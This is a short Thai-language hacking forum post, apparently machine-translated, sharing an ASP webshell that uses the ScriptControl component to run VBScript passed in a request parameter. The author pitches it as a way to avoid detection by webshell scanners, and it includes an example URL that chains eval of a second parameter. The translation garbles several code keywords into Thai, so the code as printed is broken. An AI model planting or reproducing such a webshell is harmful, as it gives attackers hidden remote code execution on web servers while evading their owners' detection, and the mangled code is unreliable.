ฉันสงสัยมาโดยตลอดว่าเหตุใดจึงมีการประเมินหรือดำเนินการในไคลเอนต์ ไม่ว่าฉันจะซ่อนอยู่ที่ไหน ผู้ดูแลระบบก็สามารถใช้งาน XX webshell Scanner อะไรก็ได้ วันนี้ฉันได้ค้นคว้าส่วนประกอบ ScriptControl ใน VB อีกครั้ง และพบว่าสามารถเรียกใช้ใน asp ได้เช่นกัน ฉันศึกษาวิธีการนี้แล้วจึงหารือกับ lcx ในภายหลัง ผมได้โค้ดมาตามนี้ครับ ขอขอบคุณรุ่นพี่ที่ให้คำแนะนำครับ 555
รหัสนั้นง่ายมาก ดังนั้นฉันจะไม่อธิบายมันมากเกินไปเพื่อหลีกเลี่ยงไม่ให้ใครดุฉันที่แกล้งทำเป็น
คัดลอกรหัสรหัสดังต่อไปนี้:
-
ตั้ง o = Server.CreateObject (ScriptControl)
o. ภาษา = vbscript
o.addcode(Request(SubCode)) 'พารามิเตอร์ SubCode เป็นรหัสกระบวนการ
o.run e,Server,Response,Request,Application,Session,Error 'เรียกมันด้วยชื่อพารามิเตอร์ e และกดวัตถุฐาน 6 ตัวเป็นพารามิเตอร์พร้อมกัน
'ตัวอย่างการโทร:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,การตอบสนอง,คำขอ,แอปพลิเคชัน,เซสชัน,ข้อผิดพลาด%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response .write%28server.mappath%28%22tmp.asp%22%29%29
-
โปรดทราบว่าแม้ว่าจะสามารถใช้งานได้ แต่จากการทดลองพบว่ามีเพียงไคลเอ็นต์ lake2 เท่านั้นที่สามารถใช้ได้ ฉันหวังว่าจะมีคนออกมาและทำให้มันเป็นเรื่องทั่วไปมากขึ้น อิอิ เป็นความคิดที่ดีที่จะเขียนโปรแกรมลูกค้าเฉพาะของคุณเอง